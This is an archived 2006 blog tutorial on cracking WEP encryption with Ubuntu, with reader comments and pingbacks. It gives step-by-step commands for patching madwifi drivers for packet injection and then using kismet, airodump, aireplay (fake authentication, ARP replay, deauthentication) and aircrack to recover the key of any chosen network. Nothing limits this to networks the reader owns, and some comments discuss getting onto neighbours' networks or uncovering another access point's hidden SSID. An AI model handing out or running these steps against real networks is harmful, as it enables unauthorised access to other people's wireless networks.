<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/11">


	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>TurkeyFarm » Cracking WEP with Ubuntu (Actually Works)</title>
	
		<meta name="robots" content="index, follow, noarchive">
	<meta name="description" content="Home page of freelance web designer Karl Bitz.">
	<meta name="keywords" content="web design, turkeyfarm, turkey farm, karl bitz, karl, bitz">


</head><body>

	<div id="title_container">
		
		</div>
<div id="content_container_container">
<div id="content_container">

<!-- end header -->
	<div id="module_whole">

	<h2>June 22, 2006</h2>
	
<div class="post" id="post-37">
	 <h1 class="storytitle"><a href="http://www.turkeyfarm.net/blog/2006/06/22/cracking-wep-with-linux-actually-works/" rel="bookmark">Cracking WEP with Ubuntu (Actually Works)</a></h1>
	 <div class="module_text">
	
	
	<div class="storycontent">
		<p>This
post should enable anyone to get Linux up and running and crack a WEP
key. It took me about 2 days and myriad tutorials to finally get this
to work, and now that I have I feel that I should share it with
everyone. I am by no means a Linux expert, but this works regardless.
All you need is a old laptop with a wireless card and a copy of Ubuntu
Linux, currently one of the most popular and easily installed
distributions of linux. If you haven’t already bought a wireless card,
you should select one from <a href="http://aircrack-ng.org/doku.php?id=faq#which_is_the_best_card_to_buy">this list</a> to save yourself some trouble.</p>
<p><a id="more-37"></a></p>
<p>First step, obviously, is to install Ubuntu. Just boot from the CD
and follow the directions. This should be fairly straightforward and
I’m not going to get into it any more than this. Once you have it
installed and the layout and theme is how you want it, go on. But do
everything in order, because otherwise it won’t really work.</p>
<p>Next step is to install the extra repositories and all the programs
that Ubuntu doesn’t preinstall. Make sure your box can connect to the
internet. If you can only connect via wireless and are having problems,
there is a package called <a href="http://packages.ubuntu.com/dapper/net/wifi-radar">Wi-Fi radar</a> that is helpful.  To install the extra repositories, open a terminal window and type the following:</p>
<blockquote><p>sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup<br>
sudo gedit /etc/apt/sources.list</p></blockquote>
<p>While in the editor, replace everything with:</p>
<blockquote><p>## Add comments (##) in front of any line to remove it from being checked.<br>
## Use the following sources.list at your own risk.<br>
deb <a rel="nofollow" title="http://archive.ubuntu.com/ubuntu" class="external free" href="http://archive.ubuntu.com/ubuntu">http://archive.ubuntu.com/ubuntu</a> dapper main restricted universe multiverse<br>
deb-src <a rel="nofollow" title="http://archive.ubuntu.com/ubuntu" class="external free" href="http://archive.ubuntu.com/ubuntu">http://archive.ubuntu.com/ubuntu</a> dapper main restricted universe multiverse</p>
<p>## MAJOR BUG FIX UPDATES produced after the final release<br>
deb <a rel="nofollow" title="http://archive.ubuntu.com/ubuntu" class="external free" href="http://archive.ubuntu.com/ubuntu">http://archive.ubuntu.com/ubuntu</a> dapper-updates main restricted universe multiverse<br>
deb-src <a rel="nofollow" title="http://archive.ubuntu.com/ubuntu" class="external free" href="http://archive.ubuntu.com/ubuntu">http://archive.ubuntu.com/ubuntu</a> dapper-updates main restricted universe multiverse</p>
<p>## UBUNTU SECURITY UPDATES<br>
deb <a rel="nofollow" title="http://security.ubuntu.com/ubuntu" class="external free" href="http://security.ubuntu.com/ubuntu">http://security.ubuntu.com/ubuntu</a> dapper-security main restricted universe multiverse<br>
deb-src <a rel="nofollow" title="http://security.ubuntu.com/ubuntu" class="external free" href="http://security.ubuntu.com/ubuntu">http://security.ubuntu.com/ubuntu</a> dapper-security main restricted universe multiverse</p>
<p>## BACKPORTS REPOSITORY (Unsupported.  May contain illegal packages.  Use at own risk.)<br>
deb <a rel="nofollow" title="http://archive.ubuntu.com/ubuntu" class="external free" href="http://archive.ubuntu.com/ubuntu">http://archive.ubuntu.com/ubuntu</a> dapper-backports main restricted universe multiverse<br>
deb-src <a rel="nofollow" title="http://archive.ubuntu.com/ubuntu" class="external free" href="http://archive.ubuntu.com/ubuntu">http://archive.ubuntu.com/ubuntu</a> dapper-backports main restricted universe multiverse</p>
<p>## PLF REPOSITORY (Unsupported.  May contain illegal packages.  Use at own risk.)<br>
deb <a rel="nofollow" title="http://packages.freecontrib.org/ubuntu/plf" class="external free" href="http://packages.freecontrib.org/ubuntu/plf">http://packages.freecontrib.org/ubuntu/plf</a> dapper free non-free<br>
deb-src <a rel="nofollow" title="http://packages.freecontrib.org/ubuntu/plf" class="external free" href="http://packages.freecontrib.org/ubuntu/plf">http://packages.freecontrib.org/ubuntu/plf</a> dapper free non-free</p></blockquote>
<p>Save the file and exit the text editor.  Next type the command:</p>
<blockquote><p>sudo apt-get update</p></blockquote>
<p>Now we have to install the packages we’ll need later on:</p>
<blockquote><p>sudo apt-get install build-essential<br>
sudo apt-get install aircrack<br>
sudo apt-get install kismet<br>
sudo apt-get install airsnort<br>
sudo apt-get install linux-source<br>
sudo apt-get install linux-headers<br>
sudo apt-get install sharutils</p></blockquote>
<p>Next, you should update your entire system by going to the System
Menu&gt;Administration&gt;Update Manager. Click ‘Check’ and begin
installing updates. Then reboot your system. After this is done, it’s
time to patch the Madwifi drivers.</p>
<p>This is where everything can be tricky. My wireless card (Linksys
WPC55AG) uses the Atheros driver, which I needed to patch. If you have
a different driver, you’re going to need to find out whether or not you
need to patch your drivers, or if they’ll even work with the Aircrack
suite. The forums at aircrack-ng.org are a good place to look and so is
a google search. If you have an Atheros card, it will be called ath0
when you type <strong>iwconfig</strong> in the terminal window, or there will be a line that says Ethernet controller: Atheros Communications… when you type <strong>lspci</strong> in the terminal.</p>
<p>Let’s apply the madwifi patch which you’ll need if you’re using the
Atheros driver. This will temporarily disable your wireless card when
it deletes the old drivers of the disk. First we’re going to navigate
to the /usr/src directory, download the new drivers, delete the old
drivers, then install the new ones and apply the patch. You can just
copy and paste the commands below into the terminal or type them
yourself.</p>
<blockquote><p>sudo -i</p>
<p>cd /usr/src<br>
wget <a href="http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz">http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz</a><br>
wget <a href="http://syserr.com/stuff/madwifi-cvs-20051025.patch">http://syserr.com/stuff/madwifi-cvs-20051025.patch</a></p>
<p>ifconfig ath0 down<br>
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal<br>
find /lib/modules -name ‘ath*’ -exec rm -v {} \;<br>
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;</p>
<p>tar zxvf madwifi-cvs-20051025.tar.gz<br>
cd madwifi<br>
patch -Np1 -i ../madwifi-cvs-20051025.patch<br>
make &amp;&amp; make install</p>
<p>modprobe ath_pci</p></blockquote>
<p>UPDATE:  Some people have been having problems with the modprobe command.  A comment below contains a fix in some cases:</p>
<blockquote><p>However, during Madwifi Installation I got this warning:</p>
<p>Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o</p>
<p>This warning can be IGNORED.</p>
<p>When I ran “modprobe ath_pci” it gave me an error message and
“dmesg” gave me some gibberish about “disagrees about version of
symbol”.</p>
<p>I browsed the web and found the solution: You have to delete the
linux-restricted modules. Just search for “linux-restricted” in
Synaptic. I removed everything but “linux-restricted-modules-common”.
Then I compiled the madwifi again and ran “modeprobe ath_pci” again. NO
ERROR this time! Authenticating and injecting works!</p>
<p>Karl, maybe you can add this to your tutorial cuz I did everything
exactly as you wrote. Apparently some network cards with atheros
chipset cause problems if you don’t remove the linux-restricdet-modules.</p>
<p>Thanks again!</p>
<p>Cheers,</p>
<p>mcgyver100</p></blockquote>
<p>If you are using the Atheros driver, next we need to configure
kismet to use the right source. If you are using another driver you’ll
have to look up what syntax you use. First navigate to the Kismet
config, then change the source line.</p>
<blockquote><p>sudo gedit /etc/kismet/kismet.conf</p></blockquote>
<p>Change the line that begins with ’source=’ to
’source=madwifi_ag,ath0,madwifi’. Now reboot the computer. After it
boots back up you should be able to access the internet again via your
wireless card.</p>
<p>Now we can begin cracking.  Open up a terminal window, enter monitor mode, and run kismet.</p>
<blockquote><p>sudo airmon start ath0<br>
sudo kismet</p></blockquote>
<p>Locate the wireless network you want to crack, and note its ESSID and channel.  Then exit by pressing Ctrl-C.</p>
<p>Next, run airodump.</p>
<blockquote><p>sudo airodump ath0 filename channel# 1</p></blockquote>
<p>The one at the end lets Airodump know we only want to capture IV’s.
The filename can be anything you want, and will be saved in your home
directory (or whatever directory you run the command from) as
filename.ivs.</p>
<p>Copy the bssid of the wireless network from the airodump window by
selecting it and pressing Shift+Ctrl+C. Open up a new terminal window
so we can run aireplay to start injecting packets so our data count
goes up. We want the data column in airodump to reach between 100,000
and 400,000. The more packets we have, the faster aircrack can find the
WEP key. If the WEP key is 128 bits, we may need up to 1,000,000
packets.</p>
<blockquote><p>sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0</p></blockquote>
<p>This should associate the network with the wireless connection. If
it times out repeatedly, you need to be closer to the wireless router
or change your interface rate by typing ’sudo iwconfig ath0 rate 1M’.</p>
<p>Next we want to start injecting packets.</p>
<blockquote><p>sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0</p></blockquote>
<p>At first, it will only read packets, and say 0 ARP requests and 0
packets sent. Just wait a minute or two and it will start sending
packets in large quantities. If it returns text that says it has been
deauthorized, press Ctrl+C and run the command again. You can try to
speed things up by entering this command:</p>
<blockquote><p>sudo aireplay -0 ath0 -a BSSID ath0</p></blockquote>
<p>Otherwise just sit back and wait. As soon as packets begin to be
sent, the data field in Airodump should start flying. Wait until the
desired number of packets have been recieved, then open a new terminal
window and run aircrack.</p>
<blockquote><p>sudo aircrack filename.ivs</p></blockquote>
<p>After a minute, aircrack should return the WEP key.  If it doesn’t, collect more packets.</p>
<p>This is by no means exhaustive, but this is what worked for me. If
you have questions feel free to ask me and I’ll try to help as best I
can, however, like I said before I’m no Linux guru, and have only been
using it for a short time. I hope this works for everybody. If you have
any changes let me know.
</p>

	</div>
		<div class="feedback">
                        	</div>
</div>
</div>

<h2 id="comments">60 Comments 
</h2>

<ol id="commentlist">

	<li id="comment-5">
			<p>Thanks for all of this.  Very well written and clear.</p>
<p>This is my first custom kernel and my unix days were 20 years ago. I
am bogged down on the make in the patching section. I get an error
saying: </p>
<p>Makefile.inc:113:  *** KERNALPATH:  /lib/modules/2.6.15-25-386/build does not exist. Stop.</p>
<p>I am pretty sure that everything prior to the make executed properly.</p>
<p>Thoughts?</p>
<p>Stephen
</p>
	<p><cite>Comment by Stephen — June 29, 2006 @ <a href="#comment-5">12:52 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-6">
			<p>Nice simple tutorial. It’s good to see more and more tutorials like this emerge.</p>
<p>If you’re interested in skipping the whole OS install, just grab a copy of BackTrack at <a href="http://www.remote-exploit.org/index.php/BackTrack" rel="nofollow">http://www.remote-exploit.org/index.php/BackTrack</a></p>
<p>It’s a live CD that you just boot, and all the tools (Kismet, aircrack…) are already on.</p>
<p>Either way, have fun!</p>
<p>–Jon Z | <a href="http://jzencovich.blogspot.com/" rel="nofollow">http://jzencovich.blogspot.com/</a>
</p>
	<p><cite>Comment by <a href="http://jzencovich.blogspot.com/" rel="external nofollow">Jonathan Zencovich</a> — July 2, 2006 @ <a href="#comment-6">11:24 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-7">
			<p>Stephen, sound like you forgot to download your kernel source package
</p>
	<p><cite>Comment by <a href="http://hinkey.ca/" rel="external nofollow">Hinkey</a> — July 2, 2006 @ <a href="#comment-7">11:58 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-8">
			<p>[…]
Author Edit 07/02/2006: Dont have linux? No Problem! Use a Ubuntu Live
CD.. Here is a sweet walk through for the not so linux savvie.. […]
</p>
	<p><cite>Pingback by <a href="http://stephengilroy.com/wordpress/?p=10" rel="external nofollow">stephengilroy[dot]com » Blog Archive » WEP Cracking, the FBI Way</a> — July 2, 2006 @ <a href="#comment-8">12:02 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-10">
			<p>Stephan,
I’ve been trying to figure this out too. You need to specify the path
to the source that downloaded. When you find it, you can just use a
command to tell the computer where teh kernelpath really is. Here’s
what I had to type:</p>
<p>export KERNELPATH=/usr/src/linux-headers-2.6.15-23-686</p>
<p>That’s for my pentium 3 processor.  Yours will probably be different.  </p>
<p>Good luck,<br>
Michael
</p>
	<p><cite>Comment by czer323 — July 2, 2006 @ <a href="#comment-10">12:26 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-11">
			<p>Thanks
for the clear information. Previously I have known of wi-fi crack to
break the WEP encryption. However, compiling the source was very much
difficult and I never get to make it work.</p>
<p>Since I have Ubuntu up and running on my <a href="http://keith.hostmatrix.org/" rel="nofollow">machine</a>, I’ll definitely try this out and crack my own network. If it’s successful or not, I’ll follow up with more information!
</p>
	<p><cite>Comment by <a href="http://keith.hostmatrix.org/" rel="external nofollow">Keith</a> — July 2, 2006 @ <a href="#comment-11">12:29 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-12">
			<p>[…] A nice tutorial on cracking WEP Encryption under Ubuntu.read more&nbsp;|&nbsp;digg story […]
</p>
	<p><cite>Pingback by <a href="http://alexabebe.com/?p=176" rel="external nofollow">» Cracking WEP with Ubuntu</a> — July 2, 2006 @ <a href="#comment-12">12:43 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-13">
			<p>Also, the order of authenticating and injecting is backwards.</p>
<p>Authenicate with base station:<br>
    sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0</p>
<p>Start injecting packets:<br>
    sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
</p>
	<p><cite>Comment by czer323 — July 2, 2006 @ <a href="#comment-13">12:57 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-14">
		<div class="authorcomment">	<p>@czer - Thanks, you’re right.  I just fixed that.
</p>
	<p><cite>Comment by <a href="http://www.turkeyfarm.net/" rel="external nofollow">Karl</a> — July 2, 2006 @ <a href="#comment-14">1:06 pm</a></cite> </p>
	</div><hr>
	</li>

	<li id="comment-15">
			<p>how do i undo all of this?
</p>
	<p><cite>Comment by Sam — July 2, 2006 @ <a href="#comment-15">1:08 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-16">
		<div class="authorcomment">	<p>Reinstall Ubuntu?  What do you need to undo?
</p>
	<p><cite>Comment by <a href="http://www.turkeyfarm.net/" rel="external nofollow">Karl</a> — July 2, 2006 @ <a href="#comment-16">1:15 pm</a></cite> </p>
	</div><hr>
	</li>

	<li id="comment-17">
			<p>Note:
When you are installing the wireless tools, you don’t have to use all
of those commands. Being a huge fan of copy/paste, the less times that
I have to do it the better!</p>
<p>Instead of:</p>
<p>sudo apt-get install build-essential<br>
sudo apt-get install aircrack<br>
sudo apt-get install kismet<br>
sudo apt-get install airsnort<br>
sudo apt-get install linux-source<br>
sudo apt-get install linux-headers<br>
sudo apt-get install sharutils</p>
<p>Do this:</p>
<p>sudo apt-get install build-essential aircrack kismet airsnort linux-source linux-headers sharutils
</p>
	<p><cite>Comment by <a href="http://www.phucsticksnation.com/" rel="external nofollow">Nomad64</a> — July 2, 2006 @ <a href="#comment-17">4:10 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-19">
			<p>To
remove the installed packages, just replace the “install” with
“remove”. You could also clean up configuration files by adding a
–purge like so:</p>
<p>  sudo apt-get remove –purge build-essential aircrack kismet airsnort linux-source linux-headers sharutils
</p>
	<p><cite>Comment by dmc — July 2, 2006 @ <a href="#comment-19">8:03 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-20">
			<p>[…] TurkeyFarm » Cracking WEP with Ubuntu (Actually Works) (tags: WEP hacking) […]
</p>
	<p><cite>Pingback by <a href="http://xiu.shoeke.com/archives/2006/07/03/links-for-2006-07-03/" rel="external nofollow">XIU’s Blog » Blog Archive » links for 2006-07-03</a> — July 2, 2006 @ <a href="#comment-20">8:23 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-21">
			<p>[…] TurkeyFarm » Cracking WEP with Ubuntu (Actually Works) (tags: WEP wireless linux hacking ubuntu wifi cracking) […]
</p>
	<p><cite>Pingback by <a href="http://rafaelmontanoonline.com/blog/2006/07/02/links-for-2006-07-03/" rel="external nofollow">RafaelMontanoOnline Blog » links for 2006-07-03</a> — July 2, 2006 @ <a href="#comment-21">8:26 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-22">
			<p>[…] TurkeyFarm » Cracking WEP with Ubuntu (Actually Works) (tags: howto ubuntu wifi hacking wireless WEP)    Sin comentarios […]
</p>
	<p><cite>Pingback by <a href="http://proletarium.org/2006/07/03/links-for-2006-07-03" rel="external nofollow">Proletarium — links for 2006-07-03</a> — July 3, 2006 @ <a href="#comment-22">12:29 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-23">
			<p>Injecting
only works with certain wireless cards. It does NOT work with any of
the Centrino-Notebooks - which I guess make up a sizable part of
available notebooks.</p>
<p>So, when injecting is not possible, one needs to collect plenty of
packets the old way, which means waiting and listening. Luckily plenty
of people have fun things like uPNP turned on which generates a steady
flow of packets - yet takes time.
</p>
	<p><cite>Comment by Namer — July 3, 2006 @ <a href="#comment-23">3:07 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-24">
			<p>[…]
Leo en TurkeyFarm: El dia de ayer entro en vigor el nuevo carnet por
puntos para los conductores, que tiene como objetivo reducir la
siniestralidad y la mortalidad en las carreteras españolas. […]
</p>
	<p><cite>Pingback by <a href="http://despresurizados.blogsome.com/2006/07/03/politicos-por-puntos/" rel="external nofollow">despresurizados.com :: Políticos por puntos :: July :: 2006</a> — July 3, 2006 @ <a href="#comment-24">3:19 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-25">
			<p>I
just followed these instructions but when it came to deleting the
drivers and then patching them, I could no longer see the ath0
interface, even after several reboots and repatches. Any thoughts?
</p>
	<p><cite>Comment by Stephen — July 3, 2006 @ <a href="#comment-25">3:42 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-26">
			<p>Upon
further inspection, if I modprobe ath_pci, I get a long list of errors
consisting of various “Unknown symbol ieee80211_[etc]” and “disagrees
about version of symbol ieee80211_[etc]” errors. Perhaps something was
not installed?
</p>
	<p><cite>Comment by Stephen — July 3, 2006 @ <a href="#comment-26">4:53 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-27">
			<p>You genius. What an innovative method
</p>
	<p><cite>Comment by <a href="http://www.wirah.com/" rel="external nofollow">web design uk</a> — July 3, 2006 @ <a href="#comment-27">8:02 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-29">
			<p>Instead of updating with the update manager do it from the command line, it is generally safer.</p>
<p>sudo apt-get dist-upgrade
</p>
	<p><cite>Comment by <a href="http://benhoman.com/" rel="external nofollow">Ben</a> — July 3, 2006 @ <a href="#comment-29">9:21 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-30">
		<div class="authorcomment">	<p>@Stephen
- Sorry I forgot to include the modprobe ath_pci command. However, when
I ran it I didn’t get any errors, it just brought my card back up. I
don’t know why you are seeing those errors or how to fix it.
</p>
	<p><cite>Comment by <a href="http://www.turkeyfarm.net/" rel="external nofollow">Karl</a> — July 3, 2006 @ <a href="#comment-30">9:22 am</a></cite> </p>
	</div><hr>
	</li>

	<li id="comment-31">
			<p>Turns
out that those drivers were old and didn’t work with my card. What
exactly does the patch do and is it needed? Would the new madwifi
drivers keep the thing from working?
</p>
	<p><cite>Comment by Stephen — July 3, 2006 @ <a href="#comment-31">1:28 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-32">
			<p>[…]
Crackeando WEP con Ubuntu Interesante y extenso documento en inglés
donde explican como crackear una wifi cifrada con WEP desde Ubuntu.
Vía: Meneame (tags: Aircrack Ubuntu Seguridad Tutoriales Wireless
Linux) […]
</p>
	<p><cite>Pingback by <a href="http://diegolo.wordpress.com/2006/07/03/links-for-2006-07-03/" rel="external nofollow">diegolo 3.0 » Blog Archive » links for 2006-07-03</a> — July 3, 2006 @ <a href="#comment-32">4:18 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-33">
			<p>[…] TurkeyFarm » Cracking WEP with Ubuntu (Actually Works) (tags: security howto wireless wifi wep) […]
</p>
	<p><cite>Pingback by <a href="http://www.cdavis.us/2006/07/03/links-for-2006-07-03/" rel="external nofollow">It tastes like burning » links for 2006-07-03</a> — July 3, 2006 @ <a href="#comment-33">6:22 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-34">
		<div class="authorcomment">	<p>@Stephen
- The drivers are old on purpose. The new ones don’t support
simultaneously injecting and catching packets, that’s what the patch is
for.
</p>
	<p><cite>Comment by <a href="http://www.turkeyfarm.net/" rel="external nofollow">Karl</a> — July 3, 2006 @ <a href="#comment-34">8:07 pm</a></cite> </p>
	</div><hr>
	</li>

	<li id="comment-35">
			<p>[…] TurkeyFarm » Cracking WEP with Ubuntu (Actually Works) (tags: wireless ubuntu) […]
</p>
	<p><cite>Pingback by <a href="http://www.likeyourwork.com/likeyourwork/?p=121" rel="external nofollow">Like Your Work » Blog Archive » links for 2006-07-04</a> — July 3, 2006 @ <a href="#comment-35">8:24 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-36">
			<p>[…] TurkeyFarm » Cracking WEP with Ubuntu (Actually Works) (tags: linux WEP ubuntu hacking security wireless howto hack) […]
</p>
	<p><cite>Pingback by <a href="http://fleetingthoughts.wordpress.com/2006/07/03/links-for-2006-07-04/" rel="external nofollow">Fleeting Thoughts » links for 2006-07-04</a> — July 3, 2006 @ <a href="#comment-36">9:17 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-38">
			<p>[…] TurkeyFarm » Cracking WEP with Ubuntu (Actually Works) (tags: linux WEP ubuntu hacking wireless security wifi) […]
</p>
	<p><cite>Pingback by <a href="http://blog.steve-miller.is-a-geek.com/archives/2006/07/03/links-for-2006-07-04/" rel="external nofollow">links for 2006-07-04 | Musings by Steve Miller</a> — July 4, 2006 @ <a href="#comment-38">12:18 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-39">
			<p>Interesting, however there is a slight caveat.</p>
<p>If you use your method you disable WPA encryption in Network Manager.<br>
I also tried using madwifi-old and WPA menus dont work either..</p>
<p>There HAS to be a way to have WPA support and have packet injection supported drivers, i just have to find a way
</p>
	<p><cite>Comment by Taimur Khan — July 4, 2006 @ <a href="#comment-39">1:21 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-40">
			<p>Just leaving a website with a ton of information about aircrack.</p>
<p><a href="http://aircrack-ng.org/" rel="nofollow">http://aircrack-ng.org/</a></p>
<p>Apparently someone has picked up on the original aircrack project
and is trying to give it some more features. Tons of other switches and
features, plus there’s a forum. I think that would be pretty helpful to
most people having issues. Also, the new madwifi-ng drivers are
compatible with injection, but you’ll need patches from this site to
make them work faster? I’m not 100% clear on this yet as I haven’t been
able to do any real testing. </p>
<p>Good luck to everyone,<br>
Michael
</p>
	<p><cite>Comment by czer323 — July 4, 2006 @ <a href="#comment-40">2:31 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-41">
			<p>Hey Karl,</p>
<p>Really nice tutorial. Very clearly writen! </p>
<p>Unfortunately it doesn’t work for me cuz ath0 is gone after
madwifi-patching and installing. I wonder which GCC version you used to
compile all that?I read it has to be the same as the one used for the
Kernel- I tried GCC 4. Did you get any warnings or error messages at
all during installation?</p>
<p>Thanks for your support,</p>
<p>mcgyver100
</p>
	<p><cite>Comment by mcgyver100 — July 4, 2006 @ <a href="#comment-41">9:49 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-42">
			<p>[…]
With all the Linux distros out there it can be hard to choose just
one.&nbsp; I however am starting to really like Ubuntu.&nbsp; It seems
that the popularity of this distro has revealed its many uses. <a href="http://www.turkeyfarm.net/blog" rel="nofollow">www.turkeyfarm.net/blog</a>
has a nice tutorial on cracking WEP Encryption under Ubuntu. I can’t
wait to see more developments and uses for Ubuntu as its popularity
grows. […]
</p>
	<p><cite>Pingback by <a href="http://hackcraft.wordpress.com/2006/07/04/cracking-wep-with-ubuntu/" rel="external nofollow">hackcraft » Cracking WEP with Ubuntu</a> — July 4, 2006 @ <a href="#comment-42">10:29 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-43">
		<div class="authorcomment">	<p>@mcgyver100
- I didn’t get any error messages, and unfortunately the box I did it
on is at work, not here with me, so I can’t tell you what version of
gcc I have. It was whatever Ubuntu installed when I installed
build-essential.
</p>
	<p><cite>Comment by <a href="http://www.turkeyfarm.net/" rel="external nofollow">Karl</a> — July 4, 2006 @ <a href="#comment-43">5:40 pm</a></cite> </p>
	</div><hr>
	</li>

	<li id="comment-44">
			<p>the line:<br>
 sudo airodump filename ath0 channel# 1<br>
seems wrong. This works better:<br>
 sudo airodump ath0 filename channel# 1</p>
<p>example for linksys card channel 6:<br>
 sudo airodump ra0 dump 6
</p>
	<p><cite>Comment by Cesco — July 4, 2006 @ <a href="#comment-44">6:21 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-45">
			<p>Hey Karl and Stephen,</p>
<p>I figured out what the problem was.It wasn’t caused by a different GCC versions. GCC 4 works just fine with Dapper Drake.</p>
<p>However, during Madwifi Installation I got this warning:</p>
<p>Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o</p>
<p>This warning can be IGNORED.</p>
<p>When I ran “modprobe ath_pci” it gave me an error message and
“dmesg” gave me some gibberish about “disagrees about version of
symbol”.</p>
<p>I browsed the web and found the solution: You have to delete the
linux-restricted modules. Just search for “linux-restricted” in
Synaptic. I removed everything but “linux-restricted-modules-common”.
Then I compiled the madwifi again and ran “modeprobe ath_pci” again. NO
ERROR this time! Authenticating and injecting works!</p>
<p>Karl, maybe you can add this to your tutorial cuz I did everything
exactly as you wrote. Apparently some network cards with atheros
chipset cause problems if you don’t remove the linux-restricdet-modules.</p>
<p>Thanks again!</p>
<p>Cheers,</p>
<p>mcgyver100
</p>
	<p><cite>Comment by mcgyver100 — July 5, 2006 @ <a href="#comment-45">4:48 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-46">
		<div class="authorcomment">	<p>@mcgyver - Thanks, I added your explanation above.
</p>
	<p><cite>Comment by <a href="http://www.turkeyfarm.net/" rel="external nofollow">Karl</a> — July 5, 2006 @ <a href="#comment-46">7:52 am</a></cite> </p>
	</div><hr>
	</li>

	<li id="comment-47">
			<p>[…]
How about the spread of malicious information. Spread under the guise
of “This is for educational purposes only.” Interesting little article
I came across that was posted recently is how to use Ubuntu (the best
linux desktop around) to crack WEP security on wireless routers. Since
most people have finally got around to wireless routers, those of us
living in highrise bldgs can usually pick up a neighbors signal. 2 yrs
ago I could jump on the neighbors wireless. Today, everyone has figured
out how to setup the WEP security. […]
</p>
	<p><cite>Pingback by <a href="http://groovinwithfred.net/?p=15" rel="external nofollow">goovin with -fred- » Blog Archive » Crack This</a> — July 5, 2006 @ <a href="#comment-47">7:04 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-48">
			<p>I had the same modprobe problems on the ASUS W5A.<br>
The instructions were a little unclear but this solved it for me…</p>
<p>Before getting and patching the madwifi drivers, run this:</p>
<p># apt-get remove linux-restricted-modules-$(uname -r)</p>
<p>then run the madwifi block of instructions up to and including the ‘modprobe ath_pci’<br>
then run this to re-install the restricted modules</p>
<p># apt-get install linux-restricted-modules-$(uname -r)</p>
<p>All is good and no more errors…
</p>
	<p><cite>Comment by Zilth — July 5, 2006 @ <a href="#comment-48">8:41 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-49">
			<p>Hi..
I own a Netgear WAB501 card and I’ve done all the steps up to
configuring madwifi step “ifconfig ath0 down”. When I type this, it
says “ath0: ERROR while getting interface flags: No such device”. When
I type iwconfig I don’t see ath0 but when I type lspci I see the
wireless card. How do I remedy this situation? </p>
<p>Also… note that before I restarted my computer after the previous
steps ath0 was present. Now it is no longer visible, despite many
restarts.</p>
<p>Any help would be appreciated! My email is ktzero3 at gmail if you’re willing to help! Thanks in advance
</p>
	<p><cite>Comment by Ktzero3 — July 5, 2006 @ <a href="#comment-49">11:36 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-50">
		<div class="authorcomment">	<p>@Ktzero3
- I’m not really sure what the problem is. All that command does is
disable the device and if the device is present, there should be no
error. I can’t really help you, sorry.
</p>
	<p><cite>Comment by <a href="http://www.turkeyfarm.net/" rel="external nofollow">Karl</a> — July 6, 2006 @ <a href="#comment-50">9:07 am</a></cite> </p>
	</div><hr>
	</li>

	<li id="comment-51">
			<p>OT queation:</p>
<p>How to discover the SSID of an AP which has no clients?</p>
<p>airodump and kismet have no problem discovering my neighbours SSID
after some time. But there is another AP with a hidden SSID i cant
discover. aireplay manages to associate to this AP’s mac with ssid =
any, but not more. How can i discover this AP’s real ssid ?
</p>
	<p><cite>Comment by cesco — July 6, 2006 @ <a href="#comment-51">11:52 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-52">
			<p>[…] (more…)    &nbsp; […]
</p>
	<p><cite>Pingback by <a href="http://zean.no-ip.info/%7Ezean/blog/?p=469" rel="external nofollow">zean.no-ip.info » Cracking WEP with Ubuntu (Actually Works)</a> — July 6, 2006 @ <a href="#comment-52">9:00 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-53">
			<p>I get the following errors right after I do the rmmod</p>
<p>root@delllap:/usr/src# ifconfig ath0 down<br>
root@delllap:/usr/src# rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal<br>
ERROR: Module ath_rate_sample is in use by ath_pci<br>
ERROR: Module wlan_wep is in use<br>
